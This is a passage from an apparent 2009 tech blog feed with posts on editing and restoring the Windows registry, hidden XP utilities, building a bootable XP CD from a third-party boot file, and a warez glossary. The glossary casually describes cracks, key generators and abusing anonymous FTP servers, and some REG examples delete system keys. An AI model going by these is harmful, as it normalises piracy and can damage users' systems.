right-clicking your mouse. And you can rename any value and almost any key with the same method used to rename files; right-click on an object and click rename, or click on it twice (slowly), or just press F2 on the keyboard. Lastly, you can delete a key or value by clicking on it, and pressing Delete on the keyboard, or by right-clicking on it, and choosing Delete.&lt;br /&gt;&lt;br /&gt;Note: it is always a good idea to backup your registry before making any changes to it. It can be intimidating to a new user, and there is always the possibility of changing or deleting a critical setting causing you to have to reinstall the whole operating system. It's much better to be safe than sorry!&lt;br /&gt;&lt;br /&gt;Importing and Exporting Registry Settings&lt;br /&gt;&lt;br /&gt;A great feature of the Registry Editor is it's ability to import and export registry settings to a text file, this text file, identified by the .REG extension, can then be saved or shared with other people to easily modify local registry settings. You can see the layout of these text files by simply exporting a key to a file and opening it in Notepad, to do this using the Registry Editor select a key, then from the "Registry" menu choose "Export Registry File...", choose a filename and save. If you open this file in notepad you will see a file similar to the example below:&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;&lt;br /&gt;REGEDIT4&lt;br /&gt;&lt;br /&gt;[HKEY_LOCAL_MACHINE\SYSTEM\Setup]&lt;br /&gt;"SetupType"=dword:00000000&lt;br /&gt;"CmdLine"="setup -newsetup"&lt;br /&gt;"SystemPrefix"=hex:c5,0b,00,00,00,40,36,02&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The layout is quite simple, REGEDIT4 indicated the file type and version, [HKEY_LOCAL_MACHINE\SYSTEM\Setup] indicated the key the values are from, "SetupType"=dword:00000000 are the values themselves the portion after the "=" will vary depending on the type of value they are; DWORD, String or Binary.&lt;br /&gt;&lt;br /&gt;So by simply editing this file to make the changes you want, it can then be easily distributed and all that need to be done is to double-click, or choose "Import" from the Registry menu, for the settings to be added to the system Registry.&lt;br /&gt;&lt;br /&gt;Deleting keys or values using a REG file&lt;br /&gt;It is also possible to delete keys and values using REG files. To delete a key start by using the same format as the the REG file above, but place a "-" symbol in front of the key name you want to delete. For example to delete the [HKEY_LOCAL_MACHINE\SYSTEM\Setup] key the reg file would look like this:&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;&lt;br /&gt;REGEDIT4&lt;br /&gt;&lt;br /&gt;[-HKEY_LOCAL_MACHINE\SYSTEM\Setup]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The format used to delete individual values is similar, but instead of a minus sign in front of the whole key, place it after the equal sign of the value. For example, to delete the value "SetupType" the file would look like:&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;&lt;br /&gt;REGEDIT4&lt;br /&gt;&lt;br /&gt;[HKEY_LOCAL_MACHINE\SYSTEM\Setup]&lt;br /&gt;"SetupType"=-&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Use this feature with care, as deleting the wrong key or value could cause major problems within the registry, so remember to always make a backup first.&lt;br /&gt;&lt;br /&gt;Regedit Command Line Options&lt;br /&gt;Regedit has a number of command line options to help automate it's use in either batch files or from the command prompt. Listed below are some of the options, please note the some of the functions are operating system specific.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* regedit.exe [options] [filename] [regpath]&lt;br /&gt;* [filename] Import .reg file into the registry&lt;br /&gt;* /s [filename] Silent import, i.e. hide confirmation box when importing files&lt;br /&gt;* /e [filename] [regpath] Export the registry to [filename] starting at [regpath]&lt;br /&gt;e.g. regedit /e file.reg HKEY_USERS\.DEFAULT&lt;br /&gt;* /L:system Specify the location of the system.dat to use&lt;br /&gt;* /R:user Specify the location of the user.dat to use&lt;br /&gt;* /C [filename] Compress (Windows 98)&lt;br /&gt;* /D [regpath] Delete the specified key (Windows 98)&lt;br /&gt;&lt;br /&gt;Maintaining the Registry&lt;br /&gt;&lt;br /&gt;How can you backup and restore the Registry?&lt;br /&gt;&lt;br /&gt;Windows 95&lt;br /&gt;Microsoft included a utility on the Windows 95 CD-ROM that lets you create backups of the Registry on your computer. The Microsoft Configuration Backup program, CFGBACK.EXE, can be found in the \Other\Misc\Cfgback directory on the Windows 95 CD-ROM. This utility lets you create up to nine different backup copies of the Registry, which it stores, with the extension RBK, in your \Windows directory. If your system is set up for multiple users, CFGBACK.EXE won't back up the USER.DAT file.&lt;br /&gt;&lt;br /&gt;After you have backed up your Registry, you can copy the RBK file onto a floppy disk for safekeeping. However, to restore from a backup, the RBK file must reside in the \Windows directory. Windows 95 stores the backups in compressed form, which you can then restore only by using the CFGBACK.EXE utility.&lt;br /&gt;&lt;br /&gt;Windows 98&lt;br /&gt;Microsoft Windows 98 automatically creates a backup copy of the registry every time Windows starts, in addition to this you can manually create a backup using the Registry Checker utility by running SCANREGW.EXE from Start | Run menu.&lt;br /&gt;&lt;br /&gt;What to do if you get a Corrupted Registry&lt;br /&gt;Windows 95, 98 and NT all have a simple registry backup mechanism that is quite reliable, although you should never simply rely on it, remember to always make a backup first!&lt;br /&gt;&lt;br /&gt;Windows 95&lt;br /&gt;In the Windows directory there are several hidden files, four of these will be SYSTEM.DAT &amp; USER.DAT, your current registry, and SYSTEM.DA0 &amp; USER.DA0, a backup of your registry. Windows 9x has a nice reature in that every time it appears to start successfully it will copy the registry over these backup files, so just in case something goes wrong can can restore it to a known good state. To restore the registry follow these instruction:&lt;br /&gt;[list=1]&lt;br /&gt;* Click the Start button, and then click Shut Down.&lt;br /&gt;&lt;br /&gt;* Click Restart The Computer In MS-DOS Mode, then click Yes.&lt;br /&gt;&lt;br /&gt;* Change to your Windows directory. For example, if your Windows directory is c:\windows, you would type the following:&lt;br /&gt;&lt;br /&gt;cd c:\windows&lt;br /&gt;&lt;br /&gt;* Type the following commands, pressing ENTER after each one. (Note that SYSTEM.DA0 and USER.DA0 contain the number zero.)&lt;br /&gt;&lt;br /&gt;attrib -h -r -s system.dat&lt;br /&gt;attrib -h -r -s system.da0&lt;br /&gt;copy system.da0 system.dat&lt;br /&gt;attrib -h -r -s user.dat&lt;br /&gt;attrib -h -r -s user.da0&lt;br /&gt;copy user.da0 user.dat&lt;br /&gt;&lt;br /&gt;* Restart your computer.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Following this procedure will restore your registry to its state when you last successfully started your computer.&lt;br /&gt;&lt;br /&gt;If all else fails, there is a file on your hard disk named SYSTEM.1ST that was created when Windows 95 was first successfully installed. If necessary you could also change the file attributes of this file from read-only and hidden to archive to copy the file to C:\WINDOWS\SYSTEM.DAT.&lt;br /&gt;&lt;br /&gt;Windows NT&lt;br /&gt;On Windows NT you can use either the "Last Known Good" option or RDISK to restore to registry to a stable working configuration.&lt;br /&gt;&lt;br /&gt;How can I clean out old data from the Registry?&lt;br /&gt;Although it's possible to manually go through the Registry and delete unwanted entries, Microsoft provides a tool to automate the process, the program is called RegClean. RegClean analyzes Windows Registry keys stored in a common location in the Windows Registry. It finds keys that contain erroneous values, it removes them from the Windows Registry after having recording those entries in the Undo.Reg file.</description><link>http://zts-zts.blogspot.com/2009/08/registry.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-724436492745448173</guid><pubDate>Mon, 10 Aug 2009 17:10:00 +0000</pubDate><atom:updated>2009-08-10T10:10:49.257-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Xp-Tricks</category><title>WINDOWS XP HIDDEN APPS</title><description>To run any of these apps go to Start &gt; Run and type the executable name (ie charmap).&lt;br /&gt;&lt;br /&gt;WINDOWS XP HIDDEN APPS:&lt;br /&gt;=========================================&lt;br /&gt;&lt;br /&gt;1) Character Map = charmap.exe (very useful for finding unusual characters)&lt;br /&gt;&lt;br /&gt;2) Disk Cleanup = cleanmgr.exe&lt;br /&gt;&lt;br /&gt;3) Clipboard Viewer = clipbrd.exe (views contents of Windows clipboard)&lt;br /&gt;&lt;br /&gt;4) Dr Watson = drwtsn32.exe (Troubleshooting tool)&lt;br /&gt;&lt;br /&gt;5) DirectX diagnosis = dxdiag.exe (Diagnose &amp; test DirectX, video &amp; sound cards)&lt;br /&gt;&lt;br /&gt;6) Private character editor = eudcedit.exe (allows creation or modification of characters)&lt;br /&gt;&lt;br /&gt;7) IExpress Wizard = iexpress.exe (Create self-extracting / self-installing package)&lt;br /&gt;&lt;br /&gt;8) Microsoft Synchronization Manager = mobsync.exe (appears to allow synchronization of files on the network for when working offline. Apparently undocumented).&lt;br /&gt;&lt;br /&gt;9) Windows Media Player 5.1 = mplay32.exe (Retro version of Media Player, very basic).&lt;br /&gt;&lt;br /&gt;10) ODBC Data Source Administrator = odbcad32.exe (something to do with databases)&lt;br /&gt;&lt;br /&gt;11) Object Packager = packager.exe (to do with packaging objects for insertion in files, appears to have comprehensive help files).&lt;br /&gt;&lt;br /&gt;12) System Monitor = perfmon.exe (very useful, highly configurable tool, tells you everything you ever wanted to know about any aspect of PC performance, for uber-geeks only )&lt;br /&gt;&lt;br /&gt;13) Program Manager = progman.exe (Legacy Windows 3.x desktop shell).&lt;br /&gt;&lt;br /&gt;14) Remote Access phone book = rasphone.exe (documentation is virtually non-existant).&lt;br /&gt;&lt;br /&gt;15) Registry Editor = regedt32.exe [also regedit.exe] (for hacking the Windows Registry).&lt;br /&gt;&lt;br /&gt;16) Network shared folder wizard = shrpubw.exe (creates shared folders on network).&lt;br /&gt;&lt;br /&gt;17) File siganture verification tool = sigverif.exe&lt;br /&gt;&lt;br /&gt;18) Volume Contro = sndvol32.exe (I've included this for those people that lose it from the System Notification area).&lt;br /&gt;&lt;br /&gt;19) System Configuration Editor = sysedit.exe (modify System.ini &amp; Win.ini just like in Win98! ).&lt;br /&gt;&lt;br /&gt;20) Syskey = syskey.exe (Secures XP Account database - use with care, it's virtually undocumented but it appears to encrypt all passwords, I'm not sure of the full implications).&lt;br /&gt;&lt;br /&gt;21) Microsoft Telnet Client = telnet.exe&lt;br /&gt;&lt;br /&gt;22) Driver Verifier Manager = verifier.exe (seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented).&lt;br /&gt;&lt;br /&gt;23) Windows for Workgroups Chat = winchat.exe (appears to be an old NT utility to allow chat sessions over a LAN, help files available).&lt;br /&gt;&lt;br /&gt;24) System configuration = msconfig.exe (can use to control starup programs)&lt;br /&gt;&lt;br /&gt;25) gpedit.msc used to manage group policies, and permissions</description><link>http://zts-zts.blogspot.com/2009/08/windows-xp-hidden-apps.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-72142074318855507</guid><pubDate>Mon, 10 Aug 2009 17:08:00 +0000</pubDate><atom:updated>2009-08-10T10:08:33.692-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Xp-Tricks</category><title>Win Xp Bootable Cd</title><description>How to create a bootable Windows XP SP1 CD (Nero):&lt;br /&gt; &lt;br /&gt;Step 1 &lt;br /&gt;&lt;br /&gt;Create 3 folders - C:\WINXPSP1, C:\SP1106 and C:\XPBOOT &lt;br /&gt;&lt;br /&gt;Step 2 &lt;br /&gt;&lt;br /&gt;Copy the entire Windows XP CD into folder C:\WINXPSP1 &lt;br /&gt;&lt;br /&gt;Step 3 &lt;br /&gt;&lt;br /&gt;You will have to download the SP1 Update, which is 133MB. &lt;br /&gt;Rename the Service Pack file to XP-SP1.EXE &lt;br /&gt;Extract the Service Pack from the Run Dialog using the command: &lt;br /&gt;C:\XP-SP1.EXE -U -X:C:\SP1106 &lt;br /&gt;&lt;br /&gt;Step 4 &lt;br /&gt;&lt;br /&gt;Open Start/Run... and type the command: &lt;br /&gt;C:\SP1106\update\update.exe -s:C:\WINXPSP1 &lt;br /&gt;&lt;br /&gt;Click OK &lt;br /&gt;&lt;br /&gt;Folder C:\WINXPSP1 contains: Windows XP SP1 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;How to Create a Windows XP SP1 CD Bootable &lt;br /&gt;&lt;br /&gt;Step 1 &lt;br /&gt;&lt;br /&gt;Download xpboot.zip &lt;br /&gt;Code: &lt;br /&gt;Code: &lt;br /&gt;http://thro.port5.com/xpboot.zip &lt;br /&gt;&lt;br /&gt;( no download manager !! ) &lt;br /&gt;&lt;br /&gt;Extract xpboot.zip file (xpboot.bin) in to the folder C:\XPBOOT &lt;br /&gt;&lt;br /&gt;Step 2 &lt;br /&gt;&lt;br /&gt;Start Nero - Burning Rom. &lt;br /&gt;Select File &gt; New... from the menu. &lt;br /&gt;1.) Select CD-ROM (Boot) &lt;br /&gt;2.) Select Image file from Source of boot image data &lt;br /&gt;3.) Set Kind of emulation: to No Emulation &lt;br /&gt;4.) Set Load segment of sectors (hex!): to 07C0 &lt;br /&gt;5.) Set Number of loaded sectors: to 4 &lt;br /&gt;6.) Press the Browse... button &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Step 3 &lt;br /&gt;&lt;br /&gt;Select All Files (*.*) from File of type: &lt;br /&gt;Locate boot.bin in the folder C:\XPBOOT &lt;br /&gt;&lt;br /&gt;Step 4 &lt;br /&gt;&lt;br /&gt;Click ISO tab &lt;br /&gt;Set File-/Directory length to ISO Level 1 (Max. of 11 = 8 + 3 chars) &lt;br /&gt;Set Format to Mode 1 &lt;br /&gt;Set Character Set to ISO 9660 &lt;br /&gt;Check all Relax ISO Restrictions &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Step 5 &lt;br /&gt;&lt;br /&gt;Click Label Tab &lt;br /&gt;Select ISO9660 from the drop down box. &lt;br /&gt;Enter the Volume Label as WB2PFRE_EN &lt;br /&gt;Enter the System Identifier as WB2PFRE_EN &lt;br /&gt;Enter the Volume Set as WB2PFRE_EN &lt;br /&gt;Enter the Publisher as MICROSOFT CORPORATION &lt;br /&gt;Enter the Data Preparer as MICROSOFT CORPORATION &lt;br /&gt;Enter the Application as WB2PFRE_EN &lt;br /&gt;&lt;br /&gt;* For Windows XP Professional OEM substitute WB2PFRE_EN with WXPOEM_EN &lt;br /&gt;* For Windows XP Home OEM substitute WB2PFRE_EN with WXHOEM_EN &lt;br /&gt;&lt;br /&gt;Step 6 &lt;br /&gt;&lt;br /&gt;Click Burn tab &lt;br /&gt;Check Write &lt;br /&gt;Check Finalize CD (No further writing possible!) &lt;br /&gt;Set Write Method to Disk-At-Once &lt;br /&gt;&lt;br /&gt;Press New button &lt;br /&gt;&lt;br /&gt;Step 7 &lt;br /&gt;&lt;br /&gt;Locate the folder C:\WINXPSP1 &lt;br /&gt;Select everything in the folder and drag it to the ISO compilation panel. &lt;br /&gt;Click the Write CD Dialog button. &lt;br /&gt;&lt;br /&gt;Press Write &lt;br /&gt;&lt;br /&gt;You're done.</description><link>http://zts-zts.blogspot.com/2009/08/win-xp-bootable-cd.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-5545102029487754146</guid><pubDate>Mon, 10 Aug 2009 17:05:00 +0000</pubDate><atom:updated>2009-08-10T10:06:15.734-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><title>warez Definitons</title><description>0-Day - Latest software releases.&lt;br /&gt;&lt;br /&gt;0-Sec - Same as above, although the period of time between ripping a game or application and it appearing on a warez site is even shorter.&lt;br /&gt;&lt;br /&gt;Ace File - The first file in a series of compressed archives (the one you double click on to decompress all the files at once).&lt;br /&gt;&lt;br /&gt;Active List - Similar to a mailing list, but uses ICQ to send instant messages to subscribers.&lt;br /&gt;&lt;br /&gt;Alpha - Software receives this label when it is in the very early stages of development. Usually full of bugs, so don't touch it with a barge pole.&lt;br /&gt;&lt;br /&gt;Anti-Leech - A system which uses cgi scripts to prevent people stealing links and then taking the credit for uploading the files.&lt;br /&gt;&lt;br /&gt;Appz - Short for applications. For example Flash 5 or GoLie 5.5.&lt;br /&gt;&lt;br /&gt;ASF File - The worst quality movie file format (still pretty good though), much smaller in size than dat or mpg.&lt;br /&gt;&lt;br /&gt;Banner Site - Password and username restricted FTP site. To get the correct login details you must click on several banners.&lt;br /&gt;&lt;br /&gt;Beta - Refers to an almost finished piece of software that is released to the public for bug testing.&lt;br /&gt;&lt;br /&gt;BSA - An acronym for Business Software Alliance, an organisation who are responsible for enforcing anti-piracy litigation. Similar groups in charge of controlling software "theft" include the SIIA, SPA and ELSPA.&lt;br /&gt;&lt;br /&gt;BSOD - Many people read about BSODs on bulletin boards and think that they're being insulted, but there is no need to get paranoid. It is actually an acronym for "Blue Screen Of Death". These can occur for a multitude of reasons (old Bill likes to keep us guessing!) and are the bane of PC user's lives.&lt;br /&gt;&lt;br /&gt;Bulletin Board - A virtual meeting place on the web similar to a chat room except that it isn't in real time. One person leaves a message then others come along, read it and add a reply. Each new discussion is called a new topic or thread and has it's own link. Whenever a new topic is created the older topics are pushed one place downwards in the list. When someone replies to an older topic it is brought back to the top of the list.&lt;br /&gt;&lt;br /&gt;C?? File - File extension that indicates that a file is part of an .ace or .rar series of compressed files.&lt;br /&gt;&lt;br /&gt;Cgi Scripts - These are referrers which are used in url’s. When you click on a link with a ?cgi reference you are directed to a sponsor’s website or an anti-leech protected file.&lt;br /&gt;&lt;br /&gt;Cookie - A tiny text file (usually less than 1kb), which is stored on your hard drive when you visit a web site. These are used to remember who you are so that you can access members only areas on the site without having to type in a password every time or to retain your personalised settings so that they are available the next time you visit.&lt;br /&gt;&lt;br /&gt;Courier - Someone who is involved in the logistics of delivering new releases directly from the release groups themselves to FTP sites.&lt;br /&gt;&lt;br /&gt;Crack - A tiny executable file that is used to transform a shareware program into the full version. Also used to remove any copy protection from the main executable of games (this will already have been done in "ripped" warez games).&lt;br /&gt;&lt;br /&gt;CRC Error - These can occur when you try to decompress a file that has become corrupt during the downloading process, usually as a result of too much resuming.&lt;br /&gt;&lt;br /&gt;Credits - The amount of data you are permitted to download from a ratio site. The more credits you have the more software you are allowed to download.&lt;br /&gt;&lt;br /&gt;DAP - A quick way of referring to "Download Accelerator Plus", a free download manager that claims to speed up file transfers by up to three hundred per cent. It works by making multiple connections to the same file and is paid for by revolving advertising banners.Also supports resume.&lt;br /&gt;&lt;br /&gt;DAT File - File format used for movies, identical in quality and size to mpg as far as I can tell.&lt;br /&gt;&lt;br /&gt;DC - The lazy way of referring to the Dreamcast, Sega's latest console incarnation.&lt;br /&gt;&lt;br /&gt;Decompression - Unpacking many files that have been stored in a single archive.&lt;br /&gt;&lt;br /&gt;Distro - A concise means of referring to a distribution FTP site. These are huge storage areas which act as a springboard for the transfer of new releases. Their whereabouts are never public disclosed to aid their survival rate. You can think of them as the initial source from which warez emanates.&lt;br /&gt;&lt;br /&gt;Direct Downloads - Links to actual files rather than other warez sites or pages. These are usually gathered together from many different sites and put on one page for your convenience.&lt;br /&gt;&lt;br /&gt;DivX - Movies ripped from a DVD using the DivX video codecs. Can be played back using Media Player.&lt;br /&gt;&lt;br /&gt;DIZ File - Short for description. Very brief text file found in warez archives stating the title of the software, the number of files that makes up the set and the group who released it.&lt;br /&gt;&lt;br /&gt;Download (or DL) - Copying files from a web server or FTP site to your computer using a modem.&lt;br /&gt;&lt;br /&gt;Emulator - An application that simulates another computer system or console using your PC.&lt;br /&gt;&lt;br /&gt;FAQ - Stands for Frequently Asked Questions.&lt;br /&gt;&lt;br /&gt;FAW - Abbreviation for "Files Anywhere", a popular, free web storage service.&lt;br /&gt;&lt;br /&gt;File Transfer Protocol (FTP) - The method used to transfer files from one computer to another using a modem.&lt;br /&gt;&lt;br /&gt;Filler - Refers to a person who uploads stuff to pub for others to download.&lt;br /&gt;&lt;br /&gt;Flaming - A general net term for "verbally" attacking someone. This can be done via email, bulletin board, chat room or any medium which involves communication across the web.&lt;br /&gt;&lt;br /&gt;Freedrive - Virtual hard drive storage area on the web. Free to join and anything and everything can be uploaded or downloaded.&lt;br /&gt;&lt;br /&gt;Freeware - Unrestricted software that is downloaded from the net and is completely free to use. Often paid for using advertising.&lt;br /&gt;&lt;br /&gt;FTP Client / Browser - A program used to access, upload and download data from FTP sites.&lt;br /&gt;&lt;br /&gt;FXP - File eXchange Protocol - This refers to server to server transfer. You can transfer files from one pub to another using very little of your own bandwidth. This is by far the best means for distributing large files, only problem is that a very limited number of FXP capable pubs exist.&lt;br /&gt;&lt;br /&gt;Gamez - Pretty self-explanatory this one.&lt;br /&gt;&lt;br /&gt;Getright - One of the best download managers available.&lt;br /&gt;&lt;br /&gt;Gold - A piece of software is said to have gone gold when the final version is complete and it is ready to ship to the public.&lt;br /&gt;&lt;br /&gt;Gozilla - Another excellent download manager.&lt;br /&gt;&lt;br /&gt;Hacking - Gaining access to a remote computer without the authorisation to do so. Usually for the purposes of stealing confidential information or the malicious destruction of data.&lt;br /&gt;&lt;br /&gt;Hammering - Repeatedly trying to access an FTP site using an FTP client or download manager.&lt;br /&gt;&lt;br /&gt;HTTP - Stands for "Hypertext Transfer Protocol". The method you use to view a web page. Always comes before the address of a website in your Url bar.&lt;br /&gt;&lt;br /&gt;ICQ - Derives from the term "I Seek You" and is used for real time chat and transferring files over the internet.&lt;br /&gt;&lt;br /&gt;IP - 32 bit binary number identifying the position of a computer on the Internet - similar to the URL. The URL is usually easier to remember as it is alpha based rather than numerical.&lt;br /&gt;&lt;br /&gt;IP Range - usually referred to when talking about scanning a particular range of ip addresses. They can be broken down into A, B, and C ranges - AAA.BBB.CCC.xxx. Usually an entire B range will be scanned at a time.&lt;br /&gt;&lt;br /&gt;IRC - Stands for "Instant Relay Chat". Used for real time chat and transferring files over the Internet.&lt;br /&gt;&lt;br /&gt;ISO - An exact copy of an original CD, all the multimedia bits and pieces are uncut and therefore they are extremely large and awkward to download.&lt;br /&gt;&lt;br /&gt;Java - Html scripts used to add functionality to or bring web pages alive. These include animation (such as the title graphic on my main page), menus, chat rooms, buttons, pop ups and so on.&lt;br /&gt;&lt;br /&gt;KBps - Kilobytes per second - This is what most transfer speed are referring to. One Byte is comprised of 8 Bits.&lt;br /&gt;&lt;br /&gt;Kbps - Kilobits per second - This is what most modem speeds are referring to. Why? Probably to make them look faster. Divide by 8 to get KBps.&lt;br /&gt;&lt;br /&gt;Key Generator - A tiny executable program that is capable of creating a serial number from a specified username. These are specific to particular applications or utilities, so a serial number created with one key generator will only work for the program for which the key generator was developed.&lt;br /&gt;&lt;br /&gt;Lamer - An annoying and overused general derogatory term used to insult/put down anyone and everything.&lt;br /&gt;&lt;br /&gt;Leeching - Downloading files without giving anything back in return or copying other people’s links.&lt;br /&gt;&lt;br /&gt;Mirror - An exact copy of a web site that is stored on a different server. Using multiple locations for warez sites allows the site to be accessed using a different address if the main site is deleted.&lt;br /&gt;&lt;br /&gt;Modchip - Very common website sponsor found on warez sites. They don’t mind their banners being used on illegal software sites because their products are one of the “grey areas” of the law. Modchips are small pieces of electronic circuitry which allow copied games to be played on your Playstation. If a Playstation has been fitted with a Modchip it is said to have been "chipped".&lt;br /&gt;&lt;br /&gt;MP3 File - Compressed music file format. Average track size is between 3 and 4 meg compared to 40-ish meg in wav format.&lt;br /&gt;&lt;br /&gt;MPG File - The best quality and largest movie file format.&lt;br /&gt;&lt;br /&gt;Multi Web Space Faker - A tool used to create lots of free web space accounts simultaneously.&lt;br /&gt;&lt;br /&gt;Name Zero - An organisation that offers free website domain names. The main drawbacks are that you have to put up with a very bulky banner residing at the bottom of your page and the fact that you never actually own your chosen address.&lt;br /&gt;&lt;br /&gt;NFO File - Short for info or information. Basic text file containing all the important details relating to a particular release, such as number of files, release date, copy protection system, installation instructions etc.&lt;br /&gt;&lt;br /&gt;Nuked - A release is said to be nuked if it is completely unplayable. Usually when this happens another group re-releases the particular game, although fixes do sometimes follow on to rescue the game from trash can.&lt;br /&gt;&lt;br /&gt;OEM - An acronym for Original Equipment Manufacturer. OEM software products are repackaged versions of the full retail product. They are often re-branded to suit the needs of the particular vender and are much more reasonable priced because they lack excessive packaging and a hard copy of the manual.&lt;br /&gt;&lt;br /&gt;OST - Not strictly a warez term this one, but one that you are likely to come across while searching for MP3 music. It stands for original soundtrack (movie music).&lt;br /&gt;&lt;br /&gt;Patch - We all know games and applications aren't perfect. When they are released we would hope that they have been thoroughly tested for bugs and incompatibility problems, but you can guarantee that many of these will still slip through the quality control net. Once the program is released to the general public, the bug reports start to flood in. A patch is a downloadable executive file which takes these reports into account and attempts to incorporate all the fixes for these known problems. A patch can resolve incompatibility problems, prevent crashes or improve the performance of a piece of software.&lt;br /&gt;&lt;br /&gt;Piracy - The replication and distribution of videos or computer software.&lt;br /&gt;&lt;br /&gt;Pop-ups - Irritating browser windows that open automatically when you visit a warez site. Usually contain voting portals or porn sites.&lt;br /&gt;&lt;br /&gt;Port - A port is a term used when referring to FTP sites and is an essential extension of the address used to access them. If the port number of an FTP site isn't specified the default setting of 21 will automatically be used.&lt;br /&gt;&lt;br /&gt;Pron - A long time ago in a galaxy far, far away someone posted a request for porn on a bulletin board, only, because of a typing error what he ended up asking for was "pron". Since then this has become a bit of a running joke and so it is now deliberately misspelt.&lt;br /&gt;&lt;br /&gt;Proxy - A third party server which acts as an anonymous go between whenever you request a web page or contact a remote server. The message from your computer is first sent through the proxy server before being relayed to the final destination so that it appears as though the request has come from the IP address of the proxy server rather than you. Used when you wish to maintain your privacy on the net or speed up your connection (much more detailed info on this subject in the "more tips" section).&lt;br /&gt;&lt;br /&gt;Psx - A quick way of referring to the Sony Playstation.&lt;br /&gt;&lt;br /&gt;Pub - A free for all FTP site where anonymous access is permitted. They are usually used for transferring large files to many people because of their high speeds.&lt;br /&gt;&lt;br /&gt;Pub Scanner - Someone who scours the net for anonymous access FTP sites which permit the creation and deletion of files. These are then exploited by uploading software for others to share.&lt;br /&gt;&lt;br /&gt;Pub Stealer - Someone who posts the IP address of a public FTP site which they themselves have not built. Some pub stealers justify this by claiming that the elitism of private FXP groups discriminates against those people who do not have access, yet others simply post other people's work to try to claim the credit for themselves. Either way though, pub stealers are despised by the FXP groups and praised by those who would otherwise not have access to them.&lt;br /&gt;&lt;br /&gt;Rar File - The first file in a series of compressed archives (the one you double click on to decompress all the files at once). Usually decompressed using a program called Winrar.&lt;br /&gt;&lt;br /&gt;Release Groups - A group of people who are involved in cracking and / or ripping software and then repackaging it into easily downloadable segments.&lt;br /&gt;&lt;br /&gt;Ratio - Two numbers separated by a semi-colon. Indicates how much data you must upload to an FTP site before you are permitted to download anything.&lt;br /&gt;&lt;br /&gt;Reg File - Tiny file that adds essential configuration details into the registry.&lt;br /&gt;&lt;br /&gt;Resume - The ability to stop and start downloading / uploading a file whenever you choose without having to start from the beginning again.&lt;br /&gt;&lt;br /&gt;Rip - Software that has had all the non-essential gubbins removed to reduce its size. Videos and music are always the first casualties.&lt;br /&gt;&lt;br /&gt;Raped - A release is branded with this term if it has been damaged beyond repair during the ripping process.&lt;br /&gt;&lt;br /&gt;RM File - Shorthand for Real Media, a file format used to encode video sequences, which can only be played back using the "Real Player". Video clips produced using this format are not of the highest quality, but do have the advantage of a small file size.&lt;br /&gt;&lt;br /&gt;ROM - Games which are designed for other platforms, but are played on the PC using an emulator.&lt;br /&gt;&lt;br /&gt;Serial - A valid username and password that is saved as a basic text file and is used to register a shareware program and therefore remove all the restrictions.&lt;br /&gt;&lt;br /&gt;Shareware - Try before you buy software downloaded from the net.&lt;br /&gt;&lt;br /&gt;Spam - Unsolicited junk e-mail. Supposedly stands for "Stupid Person's Annoying Message".&lt;br /&gt;&lt;br /&gt;Sponsor - To make some money webmasters can place adverts on their sites. Each time you click on these adverts or banners they get paid a few cents for bringing potential customers to the sponsors website.&lt;br /&gt;&lt;br /&gt;Surfer Friendly (SF) - Surfer friendly sites supposedly have no blind links, pop-ups or porn banners. Don't be fooled by this label though as some sites will tell you fibs to get you to visit them.&lt;br /&gt;&lt;br /&gt;Sys Op - The person who has the responsibility for running the computer from which an FTP site has been established. When warez is uploaded to public FTP sites and then suddenly goes "Missing In Action" you can often lay the blame at the door of the Sys Op who has an obligation to make sure his/her server stays within the boundaries of the law (i.e. warez free).&lt;br /&gt;&lt;br /&gt;Tag / Tagged - This generally refers to the tagging of a pub. A FXP group uses a directory structure to claim it as their own. A general rule is that if a tag is 2 weeks old and not in use it has been abandoned.&lt;br /&gt;&lt;br /&gt;Top List - Chart which lists in rank order the best warez sites. Worked out on the basis of votes.&lt;br /&gt;&lt;br /&gt;Trading - Swapping warez, file for file via FTP, ICQ etc. Not usually approved of by the real warez community who believe that warez should be freely distributed. To put it simply, it is not the "warez way".&lt;br /&gt;&lt;br /&gt;Trainer - A small, executable program which sits in your taskbar while you play a game. Hotkeys are associated with cheat commands so that when they are pressed you are given extra ammo, weapons, lives or the ability to toggle between invincible/mortal modes etc etc.&lt;br /&gt;&lt;br /&gt;Trojans - Nasty virus like attachments which can be merged with executable files. These are tiny so are unlikely to arouse suspicion. When run they allow a hacker to access your computer and wreak havoc. Can occasionally be found in warez files.&lt;br /&gt;&lt;br /&gt;UBB - Shorthand for Ultimate Bulletin Board, currently the most popular script used for creating warez bulletin boards.&lt;br /&gt;&lt;br /&gt;UBB Hacks - This term falsely gives the impression that something destructive or malicious is involved, but when you hear people talking about a hack in the context of bulletin boards they are simply referring to code which helps to improve the functionality of a board. For example a "thread hack" would effect the way in which individual threads look and operate.&lt;br /&gt;&lt;br /&gt;Undeletable Pub - An anonymous access, public FTP site where the permission attributes are set to allow uploads and downloads, but do not permit deletion.&lt;br /&gt;&lt;br /&gt;Unzip - Unpacking or decompressing many files that have been stored in a single archive. Technically only used when talking about zip files.&lt;br /&gt;&lt;br /&gt;Upload - Copying files from your computer to a web server or FTP site using a modem.&lt;br /&gt;&lt;br /&gt;URL - Stands for "Uniform Resource Locator". The web site address you type into your browser.&lt;br /&gt;&lt;br /&gt;VCD - Stands for Video Compact Disc. Basically these are huge movie files which can be viewed with the latest version of Media Player.&lt;br 